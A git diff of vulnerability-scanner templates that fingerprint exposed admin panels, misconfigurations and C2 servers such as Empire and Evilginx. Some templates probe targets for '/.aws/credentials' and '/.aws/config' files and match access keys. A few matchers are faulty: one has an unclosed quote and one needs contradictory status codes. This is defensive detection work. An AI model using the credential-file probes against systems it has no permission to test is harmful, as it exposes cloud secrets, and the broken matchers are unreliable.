https://www.axxonsoft.com/products/video-management-software + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cwe-id: CWE-200 + metadata: + max-request: 1 + shodan-query: title:"Axxon Next client" + verified: true + tags: panel,axxon,vms,login,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Axxon Next client" + + - type: status + status: + - 200 diff --git a/http/exposed-panels/c2/brute-ratel-c4.yaml b/http/exposed-panels/c2/brute-ratel-c4.yaml new file mode 100644 index 0000000000..806a0b6eea --- /dev/null +++ b/http/exposed-panels/c2/brute-ratel-c4.yaml @@ -0,0 +1,28 @@ +id: brute-ratel-c4 + +info: + name: Brute Ratel C4 - Detect + author: pussycat0x + severity: info + description: | + Brute Ratel C4 (BRc4) is a legit red-teaming tool designed from the ground up with evasion capabilities in mind, but in the wrong hands can cause significant damage. Learn how to protect your organization with our Brute Ratel C4 Spotlight. + reference: + - https://bruteratel.com/ + metadata: + max-request: 1 + shodan-query: http.html_hash:-1957161625 + verified: "true" + tags: c2,bruteratel,c4 + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: dsl + dsl: + - "contains(body, '404 file not found')" + - "(\"1a279f5df4103743b823ec2a6a08436fdf63fe30\" == sha1(body))" + condition: and diff --git a/http/exposed-panels/c2/empire-c2.yaml b/http/exposed-panels/c2/empire-c2.yaml new file mode 100644 index 0000000000..a09c0b8819 --- /dev/null +++ b/http/exposed-panels/c2/empire-c2.yaml @@ -0,0 +1,26 @@ +id: empire-c2 + +info: + name: Empire C2 - Detect + author: pussycat0x + severity: info + description: | + Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers. The Empire server is written in Python 3 and is modular to allow operator flexibility. Empire comes built-in with a client that can be used remotely to access the server. There is also a GUI available for remotely accessing the Empire server. + reference: | + - https://github.com/thehappydinoa/awesome-censys-queries#security-applications + - https://bc-security.gitbook.io/empire-wiki/ + metadata: + censys-query: bc517bf173440dad15b99a051389fadc366d5df2 || dcb32e6256459d3660fdc90e4c79e95a921841cc + max-request: 1 + verified: "true" + tags: c2,ir,osint,empire + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - "(\"bc517bf173440dad15b99a051389fadc366d5df2\" == sha1(body)) || (\"dcb32e6256459d3660fdc90e4c79e95a921841cc\" == sha1(body))" diff --git a/http/exposed-panels/c2/evilginx.yaml b/http/exposed-panels/c2/evilginx.yaml new file mode 100644 index 0000000000..fd4dfcdb08 --- /dev/null +++ b/http/exposed-panels/c2/evilginx.yaml @@ -0,0 +1,28 @@ +id: evilginx + +info: + name: EvilGinx - Detect + author: pussycat0x + severity: info + description: | + Evilginx2 is a man-in-the-middle attack framework used for phishing login credentials along with session cookies which in turn allows bypassing 2-factor authentication protection. + reference: + - https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-infrastructure/delivery/evilginx + metadata: + censys-query: b18d778b4e4b6bf1fd5b2d790c941270145a6a6d + max-request: 1 + verified: "true" + tags: tech,evilginx,c2,phishing + +http: + - method: GET + path: + - "{{BaseURL}}/login" + + matchers-condition: and + matchers: + - type: dsl + dsl: + - "status_code == 200 && contains(body, 'Evilginx')" + - "(\"b18d778b4e4b6bf1fd5b2d790c941270145a6a6d\" == sha1(body))" + condition: and \ No newline at end of file diff --git a/http/exposed-panels/c2/nh-c2.yaml b/http/exposed-panels/c2/nh-c2.yaml new file mode 100644 index 0000000000..7bdc7feb49 --- /dev/null +++ b/http/exposed-panels/c2/nh-c2.yaml @@ -0,0 +1,26 @@ +id: nh-c2 + +info: + name: NH C2 Server - Detect + author: pussycat0 + severity: info + reference: + - https://twitter.com/MichalKoczwara/status/1616179246216396806 + metadata: + censys-query: 10baf5fcdde4563d3e145a1f553ae433fb1c3572 + max-request: 1 + verified: "true" + tags: tech,nh,c2 + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: dsl + dsl: + - "status_code == 301 && status_code == 302" + - "(\"03609e8e4a0a0ef888327d64ae2dc8950664219e\" == sha1(body))" + condition: and \ No newline at end of file diff --git a/http/exposed-panels/c2/viper-c2.yaml b/http/exposed-panels/c2/viper-c2.yaml new file mode 100644 index 0000000000..d2132dc2dc --- /dev/null +++ b/http/exposed-panels/c2/viper-c2.yaml @@ -0,0 +1,29 @@ +id: viper-c2 + +info: + name: Viper C2 - Detect + author: pussycat0x + severity: info + description: | + Viper is a graphical intranet penetration tool, which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration. + reference: + - https://twitter.com/MichalKoczwara/status/1635724410274414596 + metadata: + censys-query: 057f3b5488605b4d224d038e340866e2cdfed4a3 + max-request: 1 + shodan-query: http.html_hash:1015055567 + verified: "true" + tags: tech,viper,c2,malware,ir + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: dsl + dsl: + - "status_code == 404" + - "(\"057f3b5488605b4d224d038e340866e2cdfed4a3\" == sha1(body))" + condition: and diff --git a/http/exposed-panels/crontab-ui.yaml b/http/exposed-panels/crontab-ui.yaml new file mode 100644 index 0000000000..00f1282921 --- /dev/null +++ b/http/exposed-panels/crontab-ui.yaml @@ -0,0 +1,29 @@ +id: crontab-ui + +info: + name: Crontab UI - Dashboard Exposure + author: DhiyaneshDk + severity: high + reference: + - https://www.facebook.com/photo/?fbid=629288492575007&set=a.467014098802448 + metadata: + max-request: 1 + verified: true + shodan-query: html:"Crontab UI" + tags: exposure,crontab,ui + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '<title>Crontab UI' + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/exposed-panels/cryptobox-panel.yaml b/http/exposed-panels/cryptobox-panel.yaml new file mode 100644 index 0000000000..bc7382acaa --- /dev/null +++ b/http/exposed-panels/cryptobox-panel.yaml @@ -0,0 +1,41 @@ +id: cryptobox-panel + +info: + name: Cryptobox Panel - Detect + author: righettod + severity: info + description: | + Cryptobox was detected. + reference: + - https://www.ercom.com/solutions/cryptobox-presentation + metadata: + max-request: 1 + shodan-query: title:"Cryptobox" + verified: true + tags: panel,cryptobox,login,detect + +http: + - method: GET + path: + - '{{BaseURL}}' + + host-redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Cryptobox' + case-insensitive: true + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'version[0-9%A]+v([0-9.\-a-z]+)' diff --git a/http/exposed-panels/eos-http-browser.yaml b/http/exposed-panels/eos-http-browser.yaml new file mode 100644 index 0000000000..9551f22680 --- /dev/null +++ b/http/exposed-panels/eos-http-browser.yaml @@ -0,0 +1,30 @@ +id: eos-http-browser + +info: + name: EOS HTTP Browser + author: DhiyaneshDk + severity: medium + reference: + - https://www.facebook.com/photo/?fbid=634930085344181&set=pcb.634929508677572 + metadata: + max-request: 2 + verified: true + shodan-query: title:"EOS HTTP Browser" + tags: exposure,eos,httpbrowser + +http: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/eos/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'STAT TEST' + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/exposed-panels/fortinet/fortinet-panel.yaml b/http/exposed-panels/fortinet/fortinet-panel.yaml index 95addf430d..f1b6e01814 100644 --- a/http/exposed-panels/fortinet/fortinet-panel.yaml +++ b/http/exposed-panels/fortinet/fortinet-panel.yaml @@ -7,24 +7,28 @@ info: description: Fortinet login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - max-request: 1 + max-request: 2 shodan-query: http.title:"FORTINET LOGIN" - tags: panel,fortinet + verified: true + tags: panel,fortinet,login,detect http: - method: GET path: - "{{BaseURL}}" + - "{{BaseURL}}/login" + stop-at-first-match: true + host-redirects: true + max-redirects: 2 matchers-condition: and matchers: - type: word part: body words: - - 'FORTINET LOGIN' + - 'FORTINET LOGIN' - type: status status: diff --git a/http/exposed-panels/glowroot-panel.yaml b/http/exposed-panels/glowroot-panel.yaml new file mode 100644 index 0000000000..bf97dcc5eb --- /dev/null +++ b/http/exposed-panels/glowroot-panel.yaml @@ -0,0 +1,31 @@ +id: glowroot-panel + +info: + name: Glowroot - Panel + author: DhiyaneshDk + severity: info + reference: + - https://www.facebook.com/photo?fbid=618105097026680&set=a.467014098802448 + metadata: + max-request: 1 + verified: true + shodan-query: title:"Glowroot" + tags: panel,login,glowroot + +http: + - method: GET + path: + - "{{BaseURL}}/login" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Glowroot' + - 'Change my password' + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/exposed-panels/grafana-detect.yaml b/http/exposed-panels/grafana-detect.yaml index 8aa2c08ff4..b150126565 100644 --- a/http/exposed-panels/grafana-detect.yaml +++ b/http/exposed-panels/grafana-detect.yaml @@ -2,7 +2,7 @@ id: grafana-detect info: name: Grafana Login Panel - Detect - author: organiccrap + author: organiccrap,AdamCrosser,bhutch severity: info description: Grafana login panel was detected. classification: @@ -12,22 +12,31 @@ info: metadata: max-request: 1 shodan-query: title:"Grafana" - tags: panel,grafana + vendor: grafana + product: grafana + category: devops + tags: panel,grafana,detect http: - method: GET path: - "{{BaseURL}}/login" + matchers: - type: word + part: body words: - "Grafana" - part: body + extractors: - type: regex + name: version part: body group: 1 regex: - '\"version\"\:\"([0-9.]+)\"}' + - '\"subTitle\":\"Grafana v([0-9.]+)' -# Enhanced by md on 2022/11/16 + - type: kval + kval: + - version diff --git a/http/exposed-panels/iclock-admin-panel.yaml b/http/exposed-panels/iclock-admin-panel.yaml new file mode 100644 index 0000000000..cdebe0d9d6 --- /dev/null +++ b/http/exposed-panels/iclock-admin-panel.yaml @@ -0,0 +1,43 @@ +id: iclock-admin-panel + +info: + name: iClock Automatic Data Master Server Admin Panel - Detect + author: deFr0ggy + severity: info + description: An iClock Automatic Data Master Server Admin login panel was detected. + classification: + cwe-id: CWE-200 + metadata: + max-request: 2 + shodan-query: html:"iClock Automatic" + verified: true + tags: panel,iclock,login,admin + +http: + - method: GET + path: + - '{{BaseURL}}/iclock/accounts/login/' + - '{{BaseURL}}/iclock/accounts/login/?next=/iclock/data/iclock/' + + stop-at-first-match: true + host-redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"site-name">iClock Automatic Data Master Server' + - ' | Django site admin' + condition: or + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '\(v([0-9.-]+)\)' diff --git a/http/exposed-panels/jsherp-boot-panel.yaml b/http/exposed-panels/jsherp-boot-panel.yaml new file mode 100644 index 0000000000..755d0b82e5 --- /dev/null +++ b/http/exposed-panels/jsherp-boot-panel.yaml @@ -0,0 +1,29 @@ +id: jsherp-boot-panel + +info: + name: JshERP Boot Panel - Detect + author: DhiyaneshDk + severity: info + metadata: + max-request: 1 + verified: true + shodan-query: http.favicon.hash:-1298131932 + tags: panel,jsherp,login,detect + +http: + - method: GET + path: + - "{{BaseURL}}/user/login" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'jshERP-boot' + - 'ERP系统' + condition: or + + - type: status + status: + - 200 diff --git a/http/exposed-panels/metersphere-login.yaml b/http/exposed-panels/metersphere-login.yaml index 8750d082b8..c6917f4310 100644 --- a/http/exposed-panels/metersphere-login.yaml +++ b/http/exposed-panels/metersphere-login.yaml @@ -39,6 +39,6 @@ http: - type: dsl dsl: - - "contains(tolower(all_headers), 'ms_session_id')" + - "contains(tolower(header), 'ms_session_id')" # Enhanced by md on 2022/11/28 diff --git a/http/exposed-panels/ms-adcs-detect.yaml b/http/exposed-panels/ms-adcs-detect.yaml index 3ce06a6808..f43a5317cb 100644 --- a/http/exposed-panels/ms-adcs-detect.yaml +++ b/http/exposed-panels/ms-adcs-detect.yaml @@ -28,7 +28,7 @@ http: - type: dsl dsl: - - "contains(tolower(all_headers), '/certsrv')" + - "contains(tolower(header), '/certsrv')" extractors: - type: kval diff --git a/http/exposed-panels/odoo-database-manager.yaml b/http/exposed-panels/odoo-database-manager.yaml index d3e2d08953..9fa4ba6883 100644 --- a/http/exposed-panels/odoo-database-manager.yaml +++ b/http/exposed-panels/odoo-database-manager.yaml @@ -3,7 +3,7 @@ id: odoo-database-manager info: name: Odoo - Database Manager Discovery author: __Fazal,R3dg33k - severity: critical + severity: low description: Odoo database manager was discovered. metadata: max-request: 1 @@ -26,6 +26,4 @@ http: - type: status status: - - 200 - -# Enhanced by mp on 2022/07/15 + - 200 \ No newline at end of file diff --git a/http/exposed-panels/openbullet2-panel.yaml b/http/exposed-panels/openbullet2-panel.yaml new file mode 100644 index 0000000000..478a523fc4 --- /dev/null +++ b/http/exposed-panels/openbullet2-panel.yaml @@ -0,0 +1,33 @@ +id: openbullet2-panel + +info: + name: Open Bullet 2 - Panel + author: MaStErChO + severity: info + description: | + Openbullet was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + metadata: + max-request: 1 + verified: "true" + shodan-query: http.favicon.hash:-1264095219 + tags: openbullet,panel,login + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + words: + - "OpenBullet2" + + - type: status + status: + - 200 diff --git a/http/exposed-panels/pdi-device-page.yaml b/http/exposed-panels/pdi-device-page.yaml new file mode 100644 index 0000000000..a6b8b77dfa --- /dev/null +++ b/http/exposed-panels/pdi-device-page.yaml @@ -0,0 +1,29 @@ +id: pdi-device-page + +info: + name: PDI Intellifuel - Device Page + author: DhiyaneshDk + severity: low + reference: + - https://www.facebook.com/photo?fbid=629130339257489&set=a.467014098802448 + metadata: + max-request: 1 + verified: true + shodan-query: html:"PDI Intellifuel" + tags: exposure,pdi,intellifuel + +http: + - method: GET + path: + - "{{BaseURL}}/index.php" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Intellifuel Device page' + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/exposed-panels/rancher-dashboard.yaml b/http/exposed-panels/rancher-dashboard.yaml new file mode 100644 index 0000000000..20a135018a --- /dev/null +++ b/http/exposed-panels/rancher-dashboard.yaml @@ -0,0 +1,39 @@ +id: rancher-dashboard + +info: + name: Rancher Dashboard Panel - Detect + author: ritikchaddha + severity: info + description: Rancher Dashboard was detected. + reference: + - https://rancher.com/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cwe-id: CWE-200 + metadata: + max-request: 2 + shodan-query: http.favicon.hash:-1324930554 + verified: "true" + tags: panel,rancher,dashboard,login + +http: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/dashboard/auth/login" + + stop-at-first-match: true + host-redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'content="Rancher Dashboard' + - 'rancherEnv:' + condition: or + + - type: status + status: + - 200 diff --git a/http/exposed-panels/rancher-panel.yaml b/http/exposed-panels/rancher-panel.yaml index 037a1e629f..d32d7c11bf 100644 --- a/http/exposed-panels/rancher-panel.yaml +++ b/http/exposed-panels/rancher-panel.yaml @@ -2,7 +2,7 @@ id: rancher-panel info: name: Rancher Login Panel - Detect - author: princechaddha, idealphase + author: princechaddha,idealphase,ritikchaddha severity: info description: Rancher login panel was detected. reference: @@ -15,7 +15,7 @@ info: metadata: max-request: 1 verified: true - shodan-query: http.title:"Loading?" + shodan-query: http.favicon.hash:464587962 tags: panel,rancher,kubernetes,devops,cloud,login http: @@ -28,7 +28,7 @@ http: - type: word part: body words: - - "Loading?" + - "Loading" - "ember-basic-dropdown-wormhole" condition: and diff --git a/http/exposed-panels/selfcheck-panel.yaml b/http/exposed-panels/selfcheck-panel.yaml new file mode 100644 index 0000000000..01c9747f55 --- /dev/null +++ b/http/exposed-panels/selfcheck-panel.yaml @@ -0,0 +1,31 @@ +id: selfcheck-panel + +info: + name: SelfCheck System Manager - Panel + author: DhiyaneshDk + severity: info + reference: + - https://www.facebook.com/photo/?fbid=607747024729154&set=a.467014098802448 + metadata: + max-request: 1 + verified: true + shodan-query: title:"SelfCheck System Manager" + tags: panel,login,selfcheck,systemmanager + +http: + - method: GET + path: + - "{{BaseURL}}/SystemManager/Account/SignIn" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '<title>SelfCheck System Manager' + - 'Sign In' + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/exposed-panels/star-network-utility.yaml b/http/exposed-panels/star-network-utility.yaml index 0f96986fa3..062e16f1b8 100644 --- a/http/exposed-panels/star-network-utility.yaml +++ b/http/exposed-panels/star-network-utility.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: http.html:"Network Utility" - tags: panel,network,utility + tags: panel,utility http: - method: GET diff --git a/http/exposed-panels/syncserver-panel.yaml b/http/exposed-panels/syncserver-panel.yaml new file mode 100644 index 0000000000..028f288380 --- /dev/null +++ b/http/exposed-panels/syncserver-panel.yaml @@ -0,0 +1,36 @@ +id: syncserver-panel + +info: + name: Symmetricom SyncServer Panel - Detect + author: DhiyaneshDk + severity: info + metadata: + max-request: 1 + verified: true + shodan-query: html:"Symmetricom SyncServer" + tags: panel,login,syncserver,symmetricom,detect + +http: + - method: GET + path: + - "{{BaseURL}}/login.php" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Symmetricom SyncServer' + - 'login' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - "Symmetricom SyncServer ([A-Z0-9]+)" diff --git a/http/exposed-panels/teradek-panel.yaml b/http/exposed-panels/teradek-panel.yaml new file mode 100644 index 0000000000..7b6e7fa76b --- /dev/null +++ b/http/exposed-panels/teradek-panel.yaml @@ -0,0 +1,31 @@ +id: teradek-panel + +info: + name: Teradek Cube Administrative Console - Panel + author: DhiyaneshDk + severity: info + reference: + - https://www.facebook.com/photo/?fbid=612496907587499&set=a.467014098802448 + metadata: + max-request: 1 + verified: true + shodan-query: title:"Teradek Cube Administrative Console" + tags: panel,login,teradek + +http: + - method: GET + path: + - "{{BaseURL}}/login.cs" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Teradek Cube Administrative Console' + - 'Password:' + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/exposed-panels/tigase-xmpp-server.yaml b/http/exposed-panels/tigase-xmpp-server.yaml new file mode 100644 index 0000000000..c797d79616 --- /dev/null +++ b/http/exposed-panels/tigase-xmpp-server.yaml @@ -0,0 +1,29 @@ +id: tigase-xmpp-server + +info: + name: Tigase XMPP Server - Exposure + author: DhiyaneshDk + severity: info + reference: + - https://www.facebook.com/photo/?fbid=617926933711163&set=a.467014098802448 + metadata: + max-request: 1 + verified: true + shodan-query: title:"Tigase XMPP Server" + tags: tigase,xmpp,server,panel,exposure + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Tigase XMPP Server' + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/exposed-panels/tup-openframe.yaml b/http/exposed-panels/tup-openframe.yaml new file mode 100644 index 0000000000..3e091bc7db --- /dev/null +++ b/http/exposed-panels/tup-openframe.yaml @@ -0,0 +1,34 @@ +id: tup-openframe + +info: + name: T-Up OpenFrame + author: DhiyaneshDk + severity: info + reference: + - https://www.facebook.com/photo/?fbid=642772827893240&set=a.467014098802448 + metadata: + max-request: 1 + verified: true + shodan-query: http.favicon.hash:824580113 + tags: exposure,login,tup,openframe + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'T-Up OpenFrame' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/exposed-panels/wd-mycloud-panel.yaml b/http/exposed-panels/wd-mycloud-panel.yaml new file mode 100644 index 0000000000..2e30d4421a --- /dev/null +++ b/http/exposed-panels/wd-mycloud-panel.yaml @@ -0,0 +1,33 @@ +id: wd-mycloud-panel + +info: + name: WD My Cloud Panel - Detect + author: DhiyaneshDk + severity: info + reference: + - https://www.zerodayinitiative.com/blog/2023/4/19/cve-2022-29844-a-classic-buffer-overflow-on-the-western-digital-my-cloud-pro-series-pr4100 + metadata: + max-request: 1 + verified: true + shodan-query: http.favicon.hash:-1074357885 + tags: panel,login,mycloud,wd,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'WDMyCloud' + - 'Cloud_Connection_StatusID' + - 'my_cloud_os' + - 'WD Privacy Statement' + condition: or + + - type: status + status: + - 200 diff --git a/http/exposed-panels/webcomco-panel.yaml b/http/exposed-panels/webcomco-panel.yaml new file mode 100644 index 0000000000..bb4a7a55f0 --- /dev/null +++ b/http/exposed-panels/webcomco-panel.yaml @@ -0,0 +1,31 @@ +id: webcomco-panel + +info: + name: WebcomCo - Panel + author: DhiyaneshDk + severity: info + reference: + - https://www.facebook.com/photo/?fbid=626548889515634&set=a.467014098802448 + metadata: + max-request: 1 + verified: true + shodan-query: title:"WebcomCo" + tags: panel,webcomco,login + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'WebcomCo' + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/exposures/configs/aws-config.yaml b/http/exposures/configs/aws-config.yaml new file mode 100644 index 0000000000..0b74c5e270 --- /dev/null +++ b/http/exposures/configs/aws-config.yaml @@ -0,0 +1,36 @@ +id: aws-config + +info: + name: AWS Configuration - Detect + author: m4lwhere + severity: medium + description: AWS config found via /.aws/config. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 + metadata: + max-request: 1 + verified: true + tags: config,exposure,aws,credential + +http: + - method: GET + path: + - "{{BaseURL}}/.aws/config" + + matchers-condition: and + matchers: + - type: regex + regex: + - 'aws_access_key_id\s*=\s*' + - 'region\s*=\s*' + + - type: word + part: body + words: + - '[default]' + + - type: status + status: + - 200 diff --git a/http/exposures/configs/aws-credentials.yaml b/http/exposures/configs/aws-credentials.yaml new file mode 100644 index 0000000000..a1d4a7aceb --- /dev/null +++ b/http/exposures/configs/aws-credentials.yaml @@ -0,0 +1,45 @@ +id: aws-credentials + +info: + name: AWS Credentials - Detect + author: m4lwhere + severity: high + description: AWS credentials found via /.aws/credentials endpoint. + reference: + - https://aws.amazon.com/blogs/security/what-to-do-if-you-inadvertently-expose-an-aws-access-key/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L + cvss-score: 9.4 + cwe-id: CWE-200 + metadata: + max-request: 1 + verified: true + tags: config,exposure,aws,credential + +http: + - method: GET + path: + - "{{BaseURL}}/.aws/credentials" + + matchers-condition: and + matchers: + - type: regex + regex: + - 'aws_access_key_id\s*=\s*' + + - type: dsl + dsl: + - "!contains(tolower(body), 'Access Denied" + - "You don't have permission to access" + condition: or + negative: true diff --git a/http/miscellaneous/trace-method.yaml b/http/miscellaneous/http-trace.yaml similarity index 97% rename from http/miscellaneous/trace-method.yaml rename to http/miscellaneous/http-trace.yaml index 5df1ece332..c84be6e2d8 100644 --- a/http/miscellaneous/trace-method.yaml +++ b/http/miscellaneous/http-trace.yaml @@ -1,4 +1,4 @@ -id: HTTP-TRACE +id: http-trace info: name: HTTP TRACE method enabled diff --git a/http/miscellaneous/ntlm-directories.yaml b/http/miscellaneous/ntlm-directories.yaml index af8889f750..ee50002e6f 100644 --- a/http/miscellaneous/ntlm-directories.yaml +++ b/http/miscellaneous/ntlm-directories.yaml @@ -6,9 +6,9 @@ info: severity: info reference: - https://medium.com/swlh/internal-information-disclosure-using-hidden-ntlm-authentication-18de17675666 - tags: misc,fuzz,windows metadata: - max-request: 46 + max-request: 47 + tags: misc,fuzz,windows http: - raw: @@ -66,12 +66,13 @@ http: - /webticket/webticketservice.svc - /webticket/webticketservice.svcabs/ - /adfs/services/trust/2005/windowstransport + - /internal_windows_authentication/ matchers-condition: and matchers: - type: dsl dsl: - - "contains(tolower(all_headers), 'www-authenticate: ntlm')" + - "contains(tolower(header), 'www-authenticate: ntlm')" - type: status status: diff --git a/http/miscellaneous/robots-txt-endpoint.yaml b/http/miscellaneous/robots-txt-endpoint.yaml index 76fc85de27..63937e1370 100644 --- a/http/miscellaneous/robots-txt-endpoint.yaml +++ b/http/miscellaneous/robots-txt-endpoint.yaml @@ -23,7 +23,20 @@ http: internal: true iterate-all: true + matchers-condition: and matchers: + - type: word + part: body + words: + - 'User-agent:' + - 'Disallow:' + - 'Allow:' + + - type: word + part: header + words: + - "text/plain" + - type: status status: - 200 diff --git a/http/miscellaneous/robots-txt.yaml b/http/miscellaneous/robots-txt.yaml index 7ad56bef1d..2546dacd7a 100644 --- a/http/miscellaneous/robots-txt.yaml +++ b/http/miscellaneous/robots-txt.yaml @@ -13,12 +13,15 @@ http: path: - "{{BaseURL}}/robots.txt" - matchers-condition: and host-redirects: true + max-redirects: 2 + matchers-condition: and matchers: - type: word words: - - "Disallow:" + - 'User-agent:' + - 'Disallow:' + - 'Allow:' - type: word part: header diff --git a/http/misconfiguration/apache-impala.yaml b/http/misconfiguration/apache-impala.yaml new file mode 100644 index 0000000000..834aa53d59 --- /dev/null +++ b/http/misconfiguration/apache-impala.yaml @@ -0,0 +1,33 @@ +id: apache-impala + +info: + name: Apache Impala - Exposure + author: DhiyaneshDk + severity: medium + reference: + - https://www.facebook.com/photo/?fbid=627585602745296&set=pcb.627585619411961 + metadata: + max-request: 1 + verified: true + shodan-query: http.favicon.hash:587330928 + tags: misconfig,apache,impala + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Apache Impala' + - 'Process Info' + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/misconfiguration/apache/apache-zeppelin-unauth.yaml b/http/misconfiguration/apache/apache-zeppelin-unauth.yaml index dfc456cab0..0572f5e8d7 100644 --- a/http/misconfiguration/apache/apache-zeppelin-unauth.yaml +++ b/http/misconfiguration/apache/apache-zeppelin-unauth.yaml @@ -5,7 +5,7 @@ info: author: j4vaovo severity: high description: | - Apache Zeppelin server was able to be accessed because no authentication was required. + Apache Zeppelin server was able to be accessed because no authentication was required. reference: | - https://www.adminxe.com/2172.html classification: @@ -13,9 +13,10 @@ info: cvss-score: 8.6 cwe-id: CWE-285 metadata: - verified: true - shodan-query: title:"Zeppelin" fofa-query: title="Zeppelin" + max-request: 1 + shodan-query: title:"Zeppelin" + verified: true tags: misconfig,apache,zeppelin,unauth http: diff --git a/http/misconfiguration/aws-ec2-status.yaml b/http/misconfiguration/aws-ec2-status.yaml new file mode 100644 index 0000000000..0b551a9383 --- /dev/null +++ b/http/misconfiguration/aws-ec2-status.yaml @@ -0,0 +1,34 @@ +id: aws-ec2-status + +info: + name: Amazon EC2 Status + author: DhiyaneshDk + severity: info + reference: + - https://www.facebook.com/photo/?fbid=644887334348456&set=a.467014098802448 + metadata: + max-request: 1 + verified: true + shodan-query: html:"Amazon EC2 Status" + tags: misconfig,ec2,aws,amazon + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Amazon EC2 Status' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/misconfiguration/bravia-signage.yaml b/http/misconfiguration/bravia-signage.yaml new file mode 100644 index 0000000000..ff5066176b --- /dev/null +++ b/http/misconfiguration/bravia-signage.yaml @@ -0,0 +1,30 @@ +id: bravia-signage + +info: + name: BRAVIA Signage - Exposure + author: DhiyaneshDK + severity: medium + reference: + - https://twitter.com/WhiteOakSec/status/1667197552461004800 + - https://www.whiteoaksecurity.com/blog/sony-bravia-remote-code-execution-disclosure/ + metadata: + max-request: 1 + verified: "true" + shodan-query: title:"BRAVIA Signage" + tags: misconfig,exposure,bravia,sony + +http: + - method: GET + path: + - "{{BaseURL}}/#/settings" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "BRAVIA Signage" + + - type: status + status: + - 200 diff --git a/http/misconfiguration/codeigniter-errorpage.yaml b/http/misconfiguration/codeigniter-errorpage.yaml new file mode 100644 index 0000000000..c313b12f20 --- /dev/null +++ b/http/misconfiguration/codeigniter-errorpage.yaml @@ -0,0 +1,39 @@ +id: codeigniter-errorpage + +info: + name: CodeIgniter - Error Page + author: j4vaovo + severity: low + metadata: + verified: true + max-request: 1 + fofa-query: title="ErrorException" + shodan-query: title:"Error" html:"CodeIgniter" + tags: codeigniter,misconfig,error + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Error" + - "ErrorException" + - "Database Error" + condition: or + + - type: word + part: body + words: + - "CodeIgniter" + case-insensitive: true + + - type: status + status: + - 200 + - 500 + condition: or diff --git a/http/misconfiguration/dynamic-container-host.yaml b/http/misconfiguration/dynamic-container-host.yaml new file mode 100644 index 0000000000..0c15143040 --- /dev/null +++ b/http/misconfiguration/dynamic-container-host.yaml @@ -0,0 +1,29 @@ +id: dynamic-container-host + +info: + name: Dynamics Container Host - Detect + author: DhiyaneshDk + severity: low + reference: + - 